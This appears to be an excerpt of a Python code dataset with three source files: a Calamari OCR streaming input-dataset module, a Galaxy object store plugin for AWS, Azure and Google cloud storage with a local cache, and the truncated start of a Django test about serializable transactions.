source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
input_dataset.py
|
from .dataset import DataSet, DataSetMode, RawDataSet
from calamari_ocr.ocr.data_processing import DataPreprocessor
from calamari_ocr.ocr.text_processing import TextProcessor
from calamari_ocr.ocr.augmentation import DataAugmenter
from typing import Generator, Tuple, List, Any
import numpy as np
import multiprocessing
from collections import namedtuple
import queue
from calamari_ocr.utils.multiprocessing import tqdm_wrapper
from abc import ABC, abstractmethod
import logging
from .queue_helper import MaxElementsQueuer
from ..augmentation.dataaugmentationparams import DataAugmentationAmount, DataAugmentationAmountReference
logger = logging.getLogger(__name__)
class OrderedQueueTask:
def __init__(self, input_queue, output_queue, context=multiprocessing.get_context()):
self.input_queue = input_queue
self.output_queue = output_queue
self.context = context
self.p = self.context.Process(daemon=True, target=self.run)
def start(self):
self.p.start()
def stop(self):
self.p.terminate()
def join(self):
self.p.join()
def run(self) -> None:
data = []
current_idx = 0
while True:
while True:
try:
data.append(self.input_queue.get(timeout=0.1))
except queue.Empty:
continue
except KeyboardInterrupt:
return
break
data.sort(key=lambda data: data[0])
while len(data) > 0 and data[0][0] <= current_idx:
try:
self.output_queue.put(data[0], timeout=0.1)
self.output_queue.task_done()
del data[0]
current_idx += 1
except queue.Full:
continue
except KeyboardInterrupt:
return
DataProcessingTaskData = namedtuple("DataProcessingTaskData", [
"skip_invalid_gt",
"data_aug_params",
"text_processor",
"data_processor",
"data_augmenter",
"generate_only_non_augmented",
])
class DataProcessingTask:
def __init__(self, params, input_queue: multiprocessing.JoinableQueue, output_queue: multiprocessing.JoinableQueue, context=multiprocessing.get_context()):
self.params = params
self.input_queue = input_queue
self.output_queue = output_queue
self.p = context.Process(daemon=True, target=self.run)
def start(self):
self.p.start()
def stop(self):
self.p.terminate()
def join(self):
self.p.join()
def run(self) -> None:
while True:
try:
data = self.input_queue.get(timeout=0.1)
except queue.Empty:
continue
except KeyboardInterrupt:
# allow keyboard interrupt
return
out = self.apply_single(*data)
if out:
while True:
try:
self.output_queue.put(out, timeout=0.1)
break
except queue.Full:
continue
except KeyboardInterrupt:
return
self.output_queue.task_done()
def apply_single(self, idx, sample_id, line, text):
#if not dataset.is_sample_valid(sample, line, text):
# if not skip_invalid_gt:
# print("ERROR: invalid sample {}".format(sample))
# return None
if self.params.data_processor and line is not None:
line, params = self.params.data_processor.apply([line], 1, False)[0]
else:
params = None
if self.params.text_processor and text is not None:
text = self.params.text_processor.apply([text], 1, False)[0]
# data augmentation
if not self.params.data_aug_params.no_augs() \
and line is not None \
and not self.params.generate_only_non_augmented.value \
and self.params.data_augmenter \
and np.random.rand() <= self.params.data_aug_params.to_rel():
line, text = self.params.data_augmenter.augment_single(line, text)
return idx, sample_id, line, text, params
class InputDataset(ABC):
def __init__(self,
mode: DataSetMode,
):
self.mode = mode
self._generate_only_non_augmented = multiprocessing.Value('b', False)
self.initialized = False
def __enter__(self):
if self.initialized:
raise AssertionError("Input dataset already initialized.")
logger.debug("InputDataset {} entered".format(self))
self.initialized = True
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.initialized = False
logger.debug("InputDataset {} exited".format(self))
def check_initialized(self):
if not self.initialized:
raise AssertionError("InputDataset is not initialised. Call 'with InputDataset() as input_dataset:'. "
"After the scope is closed the threads will be closed, too, for cleaning up.")
@abstractmethod
def __len__(self):
return 0
@abstractmethod
def epoch_size(self):
return len(self)
@property
def generate_only_non_augmented(self):
return self._generate_only_non_augmented.value
@generate_only_non_augmented.setter
def generate_only_non_augmented(self, value):
self._generate_only_non_augmented.value = value
@abstractmethod
def text_generator(self) -> Generator[str, None, None]:
self.check_initialized()
@abstractmethod
def generator(self, epochs=1, text_only=False) -> Generator[Tuple[np.array, List[str], Any], None, None]:
self.check_initialized()
class RawInputDataset(InputDataset):
def __init__(self,
mode: DataSetMode,
raw_datas, raw_texts, raw_params,
):
super().__init__(mode)
self.preloaded_datas, self.preloaded_texts, self.preloaded_params = raw_datas, raw_texts, raw_params
def __len__(self):
if self._generate_only_non_augmented.value:
return len(self.preloaded_params)
return len(self.preloaded_datas)
def epoch_size(self):
return len(self)
def text_generator(self) -> Generator[str, None, None]:
self.check_initialized()
for text in self.preloaded_texts:
yield text
def generator(self, epochs=1, text_only=False) -> Generator[Tuple[np.array, List[str], Any], None, None]:
self.check_initialized()
for epoch in range(epochs):
if self.mode == DataSetMode.TRAIN:
# only train here, pred and eval are covered by else block
# train mode wont generate parameters
if self._generate_only_non_augmented.value:
# preloaded datas are ordered: first original data, then data augmented, however,
# preloaded params store the 'length' of the non augmented data
# thus, only orignal data is yielded
for data, text, params in zip(self.preloaded_datas, self.preloaded_texts, self.preloaded_params):
yield data, text, None
else:
# yield all data, however no params
for data, text in zip(self.preloaded_datas, self.preloaded_texts):
yield data, text, None
else:
# all other modes generate everything we got, but does not support data augmentation
for data, text, params in zip(self.preloaded_datas, self.preloaded_texts, self.preloaded_params):
yield data, text, params
class StreamingInputDataset(InputDataset):
def __init__(self,
dataset: DataSet,
data_preprocessor: DataPreprocessor,
text_preprocessor: TextProcessor,
data_augmenter: DataAugmenter = None,
data_augmentation_factor: float = 0,
skip_invalid_gt=True,
processes=4):
super().__init__(dataset.mode)
self.dataset = dataset
self.data_processor = data_preprocessor
self.text_processor = text_preprocessor
self.skip_invalid_gt = skip_invalid_gt
self.data_augmenter = data_augmenter
self.data_augmentation_params = DataAugmentationAmount.from_factor(data_augmentation_factor)
self.mp_context = multiprocessing.get_context('spawn')
self.processes = max(1, processes)
if data_augmenter and dataset.mode != DataSetMode.TRAIN and dataset.mode != DataSetMode.PRED_AND_EVAL:
# no pred_and_eval bc it's augmentation
raise Exception('Data augmentation is only supported for training, but got {} dataset instead'.format(dataset.mode))
if not self.data_augmentation_params.no_augs() and self.data_augmenter is None:
raise Exception('Requested data augmentation, but no data augmented provided. Use e. g. SimpleDataAugmenter')
self.data_input_queue = None
self.unordered_output_queue = None
self.data_processing_tasks = []
self.data_generator = None
self.ordered_output_queue = None
self.data_ordering = None
def __enter__(self):
super().__enter__()
# create all tasks and queues
self.max_queuer = MaxElementsQueuer(self.processes * 4, ctx=self.mp_context)
self.data_input_queue = self.max_queuer.input_queue
self.ordered_output_queue = self.max_queuer.output_queue
self.unordered_output_queue = self.mp_context.JoinableQueue()
self.data_processing_tasks = [
DataProcessingTask(
DataProcessingTaskData(
self.skip_invalid_gt,
self.data_augmentation_params,
self.text_processor,
self.data_processor,
self.data_augmenter,
self._generate_only_non_augmented,
),
self.data_input_queue,
self.unordered_output_queue,
) for _ in range(self.processes)
]
self.data_generator = self.dataset.create_generator(self.mp_context, self.data_input_queue)
self.data_generator.start()
self.data_ordering = OrderedQueueTask(self.unordered_output_queue, self.ordered_output_queue, self.mp_context)
self.data_ordering.start()
for p in self.data_processing_tasks:
p.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
# stop all tasks
self.data_generator.stop()
for p in self.data_processing_tasks:
p.stop()
self.data_ordering.stop()
self.data_input_queue = None
self.unordered_output_queue = None
self.data_processing_tasks = []
self.data_generator = None
self.ordered_output_queue = None
self.data_ordering = None
super().__exit__(exc_type, exc_val, exc_tb)
def __len__(self):
return len(self.dataset.samples())
def epoch_size(self):
if self._generate_only_non_augmented.value:
return len(self)
return self.data_augmentation_params.epoch_size(len(self))
def to_raw_input_dataset(self, processes=1, progress_bar=False, text_only=False) -> RawInputDataset:
print("Preloading dataset type {} with size {}".format(self.dataset.mode, len(self)))
prev = self._generate_only_non_augmented.value
self._generate_only_non_augmented.value = True
datas, texts, params = zip(*list(tqdm_wrapper(self.generator(epochs=1, text_only=text_only),
desc="Preloading data", total=len(self.dataset),
progress_bar=progress_bar)))
preloaded_datas, preloaded_texts, preloaded_params = datas, texts, params
self._generate_only_non_augmented.value = prev
if not self.data_augmentation_params.no_augs() and (self.dataset.mode == DataSetMode.TRAIN or self.dataset.mode == DataSetMode.PRED_AND_EVAL):
abs_n_augs = self.data_augmentation_params.to_abs()
preloaded_datas, preloaded_texts \
= self.data_augmenter.augment_datas(list(datas), list(texts), n_augmentations=abs_n_augs,
processes=processes, progress_bar=progress_bar)
return RawInputDataset(self.mode, preloaded_datas, preloaded_texts, preloaded_params)
def text_generator(self) -> Generator[str, None, None]:
self.check_initialized()
for _, text, _ in self.generator(epochs=1, text_only=True):
if self.text_processor:
text = self.text_processor.apply([text], 1, False)[0]
yield text
def generator(self, epochs=1, text_only=False) -> Generator[Tuple[np.array, List[str], Any], None, None]:
self.check_initialized()
self.data_generator.request(epochs, text_only)
for epoch in range(epochs):
for iter in range(len(self.dataset)):
while True:
try:
global_id, id, line, text, params = self.ordered_output_queue.get(timeout=0.1)
yield line, text, params
except queue.Empty:
# test data ordering thread was canceled
if not self.data_ordering.p.is_alive() and self.ordered_output_queue.empty():
return
continue
except KeyboardInterrupt:
return
break
|
cloud.py
|
"""
Object Store plugin for Cloud storage.
"""
import logging
import multiprocessing
import os
import os.path
import shutil
import subprocess
import threading
import time
from datetime import datetime
from galaxy.exceptions import ObjectInvalid, ObjectNotFound
from galaxy.util import (
directory_hash_id,
safe_relpath,
umask_fix_perms,
)
from galaxy.util.sleeper import Sleeper
from .s3 import parse_config_xml
from ..objectstore import ConcreteObjectStore, convert_bytes
try:
from cloudbridge.factory import CloudProviderFactory, ProviderList
from cloudbridge.interfaces.exceptions import InvalidNameException
except ImportError:
CloudProviderFactory = None
ProviderList = None
log = logging.getLogger(__name__)
NO_CLOUDBRIDGE_ERROR_MESSAGE = (
"Cloud ObjectStore is configured, but no CloudBridge dependency available."
"Please install CloudBridge or modify ObjectStore configuration."
)
class CloudConfigMixin(object):
def _config_to_dict(self):
return {
"provider": self.provider,
"auth": self.credentials,
"bucket": {
"name": self.bucket_name,
"use_reduced_redundancy": self.use_rr,
},
"connection": {
"host": self.host,
"port": self.port,
"multipart": self.multipart,
"is_secure": self.is_secure,
"conn_path": self.conn_path,
},
"cache": {
"size": self.cache_size,
"path": self.staging_path,
}
}
class Cloud(ConcreteObjectStore, CloudConfigMixin):
"""
Object store that stores objects as items in an cloud storage. A local
cache exists that is used as an intermediate location for files between
Galaxy and the cloud storage.
"""
store_type = 'cloud'
def __init__(self, config, config_dict):
super(Cloud, self).__init__(config, config_dict)
self.transfer_progress = 0
bucket_dict = config_dict['bucket']
connection_dict = config_dict.get('connection', {})
cache_dict = config_dict['cache']
self.provider = config_dict["provider"]
self.credentials = config_dict["auth"]
self.bucket_name = bucket_dict.get('name')
self.use_rr = bucket_dict.get('use_reduced_redundancy', False)
self.max_chunk_size = bucket_dict.get('max_chunk_size', 250)
self.host = connection_dict.get('host', None)
self.port = connection_dict.get('port', 6000)
self.multipart = connection_dict.get('multipart', True)
self.is_secure = connection_dict.get('is_secure', True)
self.conn_path = connection_dict.get('conn_path', '/')
self.cache_size = cache_dict.get('size', -1)
self.staging_path = cache_dict.get('path') or self.config.object_store_cache_path
self._initialize()
def _initialize(self):
if CloudProviderFactory is None:
raise Exception(NO_CLOUDBRIDGE_ERROR_MESSAGE)
self.conn = self._get_connection(self.provider, self.credentials)
self.bucket = self._get_bucket(self.bucket_name)
# Clean cache only if value is set in galaxy.ini
if self.cache_size != -1:
# Convert GBs to bytes for comparison
self.cache_size = self.cache_size * 1073741824
# Helper for interruptable sleep
self.sleeper = Sleeper()
self.cache_monitor_thread = threading.Thread(target=self.__cache_monitor)
self.cache_monitor_thread.start()
log.info("Cache cleaner manager started")
# Test if 'axel' is available for parallel download and pull the key into cache
try:
subprocess.call('axel')
self.use_axel = True
except OSError:
self.use_axel = False
@staticmethod
def _get_connection(provider, credentials):
log.debug("Configuring `{}` Connection".format(provider))
if provider == "aws":
config = {"aws_access_key": credentials["access_key"],
"aws_secret_key": credentials["secret_key"]}
connection = CloudProviderFactory().create_provider(ProviderList.AWS, config)
elif provider == "azure":
config = {"azure_subscription_id": credentials["subscription_id"],
"azure_client_id": credentials["client_id"],
"azure_secret": credentials["secret"],
"azure_tenant": credentials["tenant"]}
connection = CloudProviderFactory().create_provider(ProviderList.AZURE, config)
elif provider == "google":
config = {"gcp_service_creds_file": credentials["credentials_file"]}
connection = CloudProviderFactory().create_provider(ProviderList.GCP, config)
else:
raise Exception("Unsupported provider `{}`.".format(provider))
# Ideally it would be better to assert if the connection is
# authorized to perform operations required by ObjectStore
# before returning it (and initializing ObjectStore); hence
# any related issues can be handled properly here, and ObjectStore
# can "trust" the connection is established.
#
# However, the mechanism implemented in Cloudbridge to assert if
# a user/service is authorized to perform an operation, assumes
# the user/service is granted with an elevated privileges, such
# as admin/owner-level access to all resources. For a detailed
# discussion see:
#
# https://github.com/CloudVE/cloudbridge/issues/135
#
# Hence, if a resource owner wants to only authorize Galaxy to r/w
# a bucket/container on the provider, but does not allow it to access
# other resources, Cloudbridge may fail asserting credentials.
# For instance, to r/w an Amazon S3 bucket, the resource owner
# also needs to authorize full access to Amazon EC2, because Cloudbridge
# leverages EC2-specific functions to assert the credentials.
#
# Therefore, to adhere with principle of least privilege, we do not
# assert credentials; instead, we handle exceptions raised as a
# result of signing API calls to cloud provider (e.g., GCP) using
# incorrect, invalid, or unauthorized credentials.
return connection
@classmethod
def parse_xml(clazz, config_xml):
# The following reads common cloud-based storage configuration
# as implemented for the S3 backend. Hence, it also attempts to
# parse S3-specific configuration (e.g., credentials); however,
# such provider-specific configuration is overwritten in the
# following.
config = parse_config_xml(config_xml)
try:
provider = config_xml.attrib.get("provider")
if provider is None:
msg = "Missing `provider` attribute from the Cloud backend of the ObjectStore."
log.error(msg)
raise Exception(msg)
provider = provider.lower()
config["provider"] = provider
# Read any provider-specific configuration.
auth_element = config_xml.findall("auth")[0]
missing_config = []
if provider == "aws":
akey = auth_element.get("access_key")
if akey is None:
missing_config.append("access_key")
skey = auth_element.get("secret_key")
if skey is None:
missing_config.append("secret_key")
config["auth"] = {
"access_key": akey,
"secret_key": skey}
elif provider == "azure":
sid = auth_element.get("subscription_id")
if sid is None:
missing_config.append("subscription_id")
cid = auth_element.get("client_id")
if cid is None:
missing_config.append("client_id")
sec = auth_element.get("secret")
if sec is None:
missing_config.append("secret")
ten = auth_element.get("tenant")
if ten is None:
missing_config.append("tenant")
config["auth"] = {
"subscription_id": sid,
"client_id": cid,
"secret": sec,
"tenant": ten}
elif provider == "google":
cre = auth_element.get("credentials_file")
if not os.path.isfile(cre):
msg = "The following file specified for GCP credentials not found: {}".format(cre)
log.error(msg)
raise IOError(msg)
if cre is None:
missing_config.append("credentials_file")
config["auth"] = {
"credentials_file": cre}
else:
msg = "Unsupported provider `{}`.".format(provider)
log.error(msg)
raise Exception(msg)
if len(missing_config) > 0:
msg = "The following configuration required for {} cloud backend " \
"are missing: {}".format(provider, missing_config)
log.error(msg)
raise Exception(msg)
else:
return config
except Exception:
log.exception("Malformed ObjectStore Configuration XML -- unable to continue")
raise
def to_dict(self):
as_dict = super(Cloud, self).to_dict()
as_dict.update(self._config_to_dict())
return as_dict
def __cache_monitor(self):
time.sleep(2) # Wait for things to load before starting the monitor
while self.running:
total_size = 0
# Is this going to be too expensive of an operation to be done frequently?
file_list = []
for dirpath, _, filenames in os.walk(self.staging_path):
for filename in filenames:
filepath = os.path.join(dirpath, filename)
file_size = os.path.getsize(filepath)
total_size += file_size
# Get the time given file was last accessed
last_access_time = time.localtime(os.stat(filepath)[7])
# Compose a tuple of the access time and the file path
file_tuple = last_access_time, filepath, file_size
file_list.append(file_tuple)
# Sort the file list (based on access time)
file_list.sort()
# Initiate cleaning once within 10% of the defined cache size?
cache_limit = self.cache_size * 0.9
if total_size > cache_limit:
log.info("Initiating cache cleaning: current cache size: %s; clean until smaller than: %s",
convert_bytes(total_size), convert_bytes(cache_limit))
# How much to delete? If simply deleting up to the cache-10% limit,
# is likely to be deleting frequently and may run the risk of hitting
# the limit - maybe delete additional #%?
# For now, delete enough to leave at least 10% of the total cache free
delete_this_much = total_size - cache_limit
self.__clean_cache(file_list, delete_this_much)
self.sleeper.sleep(30) # Test cache size every 30 seconds?
def __clean_cache(self, file_list, delete_this_much):
""" Keep deleting files from the file_list until the size of the deleted
files is greater than the value in delete_this_much parameter.
:type file_list: list
:param file_list: List of candidate files that can be deleted. This method
will start deleting files from the beginning of the list so the list
should be sorted accordingly. The list must contains 3-element tuples,
positioned as follows: position 0 holds file last accessed timestamp
(as time.struct_time), position 1 holds file path, and position 2 has
file size (e.g., (<access time>, /mnt/data/dataset_1.dat), 472394)
:type delete_this_much: int
:param delete_this_much: Total size of files, in bytes, that should be deleted.
"""
# Keep deleting datasets from file_list until deleted_amount does not
# exceed delete_this_much; start deleting from the front of the file list,
# which assumes the oldest files come first on the list.
deleted_amount = 0
for entry in enumerate(file_list):
if deleted_amount < delete_this_much:
deleted_amount += entry[2]
os.remove(entry[1])
# Debugging code for printing deleted files' stats
# folder, file_name = os.path.split(f[1])
# file_date = time.strftime("%m/%d/%y %H:%M:%S", f[0])
# log.debug("%s. %-25s %s, size %s (deleted %s/%s)" \
# % (i, file_name, convert_bytes(f[2]), file_date, \
# convert_bytes(deleted_amount), convert_bytes(delete_this_much)))
else:
log.debug("Cache cleaning done. Total space freed: %s", convert_bytes(deleted_amount))
return
def _get_bucket(self, bucket_name):
try:
bucket = self.conn.storage.buckets.get(bucket_name)
if bucket is None:
log.debug("Bucket not found, creating a bucket with handle '%s'", bucket_name)
bucket = self.conn.storage.buckets.create(bucket_name)
log.debug("Using cloud ObjectStore with bucket '%s'", bucket.name)
return bucket
except InvalidNameException:
log.exception("Invalid bucket name -- unable to continue")
raise
except Exception:
# These two generic exceptions will be replaced by specific exceptions
# once proper exceptions are exposed by CloudBridge.
log.exception("Could not get bucket '{}'".format(bucket_name))
raise Exception
def _fix_permissions(self, rel_path):
""" Set permissions on rel_path"""
for basedir, _, files in os.walk(rel_path):
umask_fix_perms(basedir, self.config.umask, 0o777, self.config.gid)
for filename in files:
path = os.path.join(basedir, filename)
# Ignore symlinks
if os.path.islink(path):
continue
umask_fix_perms(path, self.config.umask, 0o666, self.config.gid)
def _construct_path(self, obj, base_dir=None, dir_only=None, extra_dir=None, extra_dir_at_root=False, alt_name=None,
obj_dir=False, **kwargs):
# extra_dir should never be constructed from provided data but just
# make sure there are no shenannigans afoot
if extra_dir and extra_dir != os.path.normpath(extra_dir):
log.warning('extra_dir is not normalized: %s', extra_dir)
raise ObjectInvalid("The requested object is invalid")
# ensure that any parent directory references in alt_name would not
# result in a path not contained in the directory path constructed here
if alt_name:
if not safe_relpath(alt_name):
log.warning('alt_name would locate path outside dir: %s', alt_name)
raise ObjectInvalid("The requested object is invalid")
# alt_name can contain parent directory references, but S3 will not
# follow them, so if they are valid we normalize them out
alt_name = os.path.normpath(alt_name)
rel_path = os.path.join(*directory_hash_id(obj.id))
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
# for JOB_WORK directory
if obj_dir:
rel_path = os.path.join(rel_path, str(obj.id))
if base_dir:
base = self.extra_dirs.get(base_dir)
return os.path.join(base, rel_path)
# S3 folders are marked by having trailing '/' so add it now
rel_path = '%s/' % rel_path
if not dir_only:
rel_path = os.path.join(rel_path, alt_name if alt_name else "dataset_%s.dat" % obj.id)
return rel_path
def _get_cache_path(self, rel_path):
return os.path.abspath(os.path.join(self.staging_path, rel_path))
def _get_transfer_progress(self):
return self.transfer_progress
def _get_size_in_cloud(self, rel_path):
try:
obj = self.bucket.objects.get(rel_path)
if obj:
return obj.size
except Exception:
log.exception("Could not get size of key '%s' from S3", rel_path)
return -1
def _key_exists(self, rel_path):
exists = False
try:
# A hackish way of testing if the rel_path is a folder vs a file
is_dir = rel_path[-1] == '/'
if is_dir:
keyresult = self.bucket.objects.list(prefix=rel_path)
if len(keyresult) > 0:
exists = True
else:
exists = False
else:
exists = True if self.bucket.objects.get(rel_path) is not None else False
except Exception:
log.exception("Trouble checking existence of S3 key '%s'", rel_path)
return False
if rel_path[0] == '/':
raise
return exists
def _in_cache(self, rel_path):
""" Check if the given dataset is in the local cache and return True if so. """
# log.debug("------ Checking cache for rel_path %s" % rel_path)
cache_path = self._get_cache_path(rel_path)
return os.path.exists(cache_path)
def _pull_into_cache(self, rel_path):
# Ensure the cache directory structure exists (e.g., dataset_#_files/)
rel_path_dir = os.path.dirname(rel_path)
if not os.path.exists(self._get_cache_path(rel_path_dir)):
os.makedirs(self._get_cache_path(rel_path_dir))
# Now pull in the file
file_ok = self._download(rel_path)
self._fix_permissions(self._get_cache_path(rel_path_dir))
return file_ok
def _transfer_cb(self, complete, total):
self.transfer_progress += 10
def _download(self, rel_path):
try:
log.debug("Pulling key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
key = self.bucket.objects.get(rel_path)
# Test if cache is large enough to hold the new file
if self.cache_size > 0 and key.size > self.cache_size:
log.critical("File %s is larger (%s) than the cache size (%s). Cannot download.",
rel_path, key.size, self.cache_size)
return False
if self.use_axel:
log.debug("Parallel pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
ncores = multiprocessing.cpu_count()
url = key.generate_url(7200)
ret_code = subprocess.call("axel -a -n %s '%s'" % (ncores, url))
if ret_code == 0:
return True
else:
log.debug("Pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
self.transfer_progress = 0 # Reset transfer progress counter
with open(self._get_cache_path(rel_path), "w+") as downloaded_file_handle:
key.save_content(downloaded_file_handle)
return True
except Exception:
log.exception("Problem downloading key '%s' from S3 bucket '%s'", rel_path, self.bucket.name)
return False
def _push_to_os(self, rel_path, source_file=None, from_string=None):
"""
Push the file pointed to by ``rel_path`` to the object store naming the key
``rel_path``. If ``source_file`` is provided, push that file instead while
still using ``rel_path`` as the key name.
If ``from_string`` is provided, set contents of the file to the value of
the string.
"""
try:
source_file = source_file if source_file else self._get_cache_path(rel_path)
if os.path.exists(source_file):
if os.path.getsize(source_file) == 0 and (self.bucket.objects.get(rel_path) is not None):
log.debug("Wanted to push file '%s' to S3 key '%s' but its size is 0; skipping.", source_file,
rel_path)
return True
if from_string:
if not self.bucket.objects.get(rel_path):
created_obj = self.bucket.objects.create(rel_path)
created_obj.upload(source_file)
else:
self.bucket.objects.get(rel_path).upload(source_file)
log.debug("Pushed data from string '%s' to key '%s'", from_string, rel_path)
else:
start_time = datetime.now()
log.debug("Pushing cache file '%s' of size %s bytes to key '%s'", source_file,
os.path.getsize(source_file), rel_path)
self.transfer_progress = 0 # Reset transfer progress counter
if not self.bucket.objects.get(rel_path):
created_obj = self.bucket.objects.create(rel_path)
created_obj.upload_from_file(source_file)
else:
self.bucket.objects.get(rel_path).upload_from_file(source_file)
end_time = datetime.now()
log.debug("Pushed cache file '%s' to key '%s' (%s bytes transfered in %s sec)",
source_file, rel_path, os.path.getsize(source_file), end_time - start_time)
return True
else:
log.error("Tried updating key '%s' from source file '%s', but source file does not exist.",
rel_path, source_file)
except Exception:
log.exception("Trouble pushing S3 key '%s' from file '%s'", rel_path, source_file)
return False
def file_ready(self, obj, **kwargs):
"""
A helper method that checks if a file corresponding to a dataset is
ready and available to be used. Return ``True`` if so, ``False`` otherwise.
"""
rel_path = self._construct_path(obj, **kwargs)
# Make sure the size in cache is available in its entirety
if self._in_cache(rel_path):
if os.path.getsize(self._get_cache_path(rel_path)) == self._get_size_in_cloud(rel_path):
return True
log.debug("Waiting for dataset %s to transfer from OS: %s/%s", rel_path,
os.path.getsize(self._get_cache_path(rel_path)), self._get_size_in_cloud(rel_path))
return False
def exists(self, obj, **kwargs):
in_cache = False
rel_path = self._construct_path(obj, **kwargs)
# Check cache
if self._in_cache(rel_path):
in_cache = True
# Check cloud
in_cloud = self._key_exists(rel_path)
# log.debug("~~~~~~ File '%s' exists in cache: %s; in s3: %s" % (rel_path, in_cache, in_s3))
# dir_only does not get synced so shortcut the decision
dir_only = kwargs.get('dir_only', False)
base_dir = kwargs.get('base_dir', None)
if dir_only:
if in_cache or in_cloud:
return True
# for JOB_WORK directory
elif base_dir:
if not os.path.exists(rel_path):
os.makedirs(rel_path)
return True
else:
return False
# TODO: Sync should probably not be done here. Add this to an async upload stack?
if in_cache and not in_cloud:
self._push_to_os(rel_path, source_file=self._get_cache_path(rel_path))
return True
elif in_cloud:
return True
else:
return False
def create(self, obj, **kwargs):
if not self.exists(obj, **kwargs):
# Pull out locally used fields
extra_dir = kwargs.get('extra_dir', None)
extra_dir_at_root = kwargs.get('extra_dir_at_root', False)
dir_only = kwargs.get('dir_only', False)
alt_name = kwargs.get('alt_name', None)
# Construct hashed path
rel_path = os.path.join(*directory_hash_id(obj.id))
# Optionally append extra_dir
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
# Create given directory in cache
cache_dir = os.path.join(self.staging_path, rel_path)
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
if not dir_only:
rel_path = os.path.join(rel_path, alt_name if alt_name else "dataset_%s.dat" % obj.id)
open(os.path.join(self.staging_path, rel_path), 'w').close()
self._push_to_os(rel_path, from_string='')
def empty(self, obj, **kwargs):
if self.exists(obj, **kwargs):
return bool(self.size(obj, **kwargs) > 0)
else:
raise ObjectNotFound('objectstore.empty, object does not exist: %s, kwargs: %s'
% (str(obj), str(kwargs)))
def size(self, obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
if self._in_cache(rel_path):
try:
return os.path.getsize(self._get_cache_path(rel_path))
except OSError as ex:
log.info("Could not get size of file '%s' in local cache, will try cloud. Error: %s", rel_path, ex)
elif self.exists(obj, **kwargs):
return self._get_size_in_cloud(rel_path)
log.warning("Did not find dataset '%s', returning 0 for size", rel_path)
return 0
def delete(self, obj, entire_dir=False, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
extra_dir = kwargs.get('extra_dir', None)
base_dir = kwargs.get('base_dir', None)
dir_only = kwargs.get('dir_only', False)
obj_dir = kwargs.get('obj_dir', False)
try:
# Remove temparory data in JOB_WORK directory
if base_dir and dir_only and obj_dir:
shutil.rmtree(os.path.abspath(rel_path))
return True
# For the case of extra_files, because we don't have a reference to
# individual files/keys we need to remove the entire directory structure
# with all the files in it. This is easy for the local file system,
# but requires iterating through each individual key in S3 and deleing it.
if entire_dir and extra_dir:
shutil.rmtree(self._get_cache_path(rel_path))
results = self.bucket.objects.list(prefix=rel_path)
for key in results:
log.debug("Deleting key %s", key.name)
key.delete()
return True
else:
# Delete from cache first
os.unlink(self._get_cache_path(rel_path))
# Delete from S3 as well
if self._key_exists(rel_path):
key = self.bucket.objects.get(rel_path)
log.debug("Deleting key %s", key.name)
key.delete()
return True
except Exception:
log.exception("Could not delete key '%s' from cloud", rel_path)
except OSError:
log.exception('%s delete error', self.get_filename(obj, **kwargs))
return False
def get_data(self, obj, start=0, count=-1, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
# Check cache first and get file if not there
if not self._in_cache(rel_path):
self._pull_into_cache(rel_path)
# Read the file content from cache
data_file = open(self._get_cache_path(rel_path), 'r')
data_file.seek(start)
content = data_file.read(count)
data_file.close()
return content
def get_filename(self, obj, **kwargs):
base_dir = kwargs.get('base_dir', None)
dir_only = kwargs.get('dir_only', False)
obj_dir = kwargs.get('obj_dir', False)
rel_path = self._construct_path(obj, **kwargs)
# for JOB_WORK directory
if base_dir and dir_only and obj_dir:
return os.path.abspath(rel_path)
cache_path = self._get_cache_path(rel_path)
# S3 does not recognize directories as files so cannot check if those exist.
# So, if checking dir only, ensure given dir exists in cache and return
# the expected cache path.
# dir_only = kwargs.get('dir_only', False)
# if dir_only:
# if not os.path.exists(cache_path):
# os.makedirs(cache_path)
# return cache_path
# Check if the file exists in the cache first
if self._in_cache(rel_path):
return cache_path
# Check if the file exists in persistent storage and, if it does, pull it into cache
elif self.exists(obj, **kwargs):
if dir_only: # Directories do not get pulled into cache
return cache_path
else:
if self._pull_into_cache(rel_path):
return cache_path
# For the case of retrieving a directory only, return the expected path
# even if it does not exist.
# if dir_only:
# return cache_path
raise ObjectNotFound('objectstore.get_filename, no cache_path: %s, kwargs: %s'
% (str(obj), str(kwargs)))
# return cache_path # Until the upload tool does not explicitly create the dataset, return expected path
def update_from_file(self, obj, file_name=None, create=False, **kwargs):
if create:
self.create(obj, **kwargs)
if self.exists(obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
# Chose whether to use the dataset file itself or an alternate file
if file_name:
source_file = os.path.abspath(file_name)
# Copy into cache
cache_file = self._get_cache_path(rel_path)
try:
if source_file != cache_file:
# FIXME? Should this be a `move`?
shutil.copy2(source_file, cache_file)
self._fix_permissions(cache_file)
except OSError:
log.exception("Trouble copying source file '%s' to cache '%s'", source_file, cache_file)
else:
source_file = self._get_cache_path(rel_path)
# Update the file on cloud
self._push_to_os(rel_path, source_file)
else:
raise ObjectNotFound('objectstore.update_from_file, object does not exist: %s, kwargs: %s'
% (str(obj), str(kwargs)))
def get_object_url(self, obj, **kwargs):
if self.exists(obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
try:
key = self.bucket.objects.get(rel_path)
return key.generate_url(expires_in=86400) # 24hrs
except Exception:
log.exception("Trouble generating URL for dataset '%s'", rel_path)
return None
def get_store_usage_percent(self):
return 0.0
|
test_serializable_count_can_fail.py
|
##############
# Setup Django
import django
django.setup()
#############
# Test proper
import threading
import time
import pytest
from django.db import DatabaseError, connection, transaction
from django.db.models import F, Subquery
from app.models import Sock
@pytest.mark.django_db
def test_serializable_count_can_fail():
def create():
Sock.objects.all().delete()
Sock.objects.create(id_a=1, id_b=1, colour='black', hits=1)
Sock.objects.create(id_a=2, id_b=2, colour='white', hits=1)
create_thread = threading.Thread(target=create)
create_thread.start()
create_thread.join()
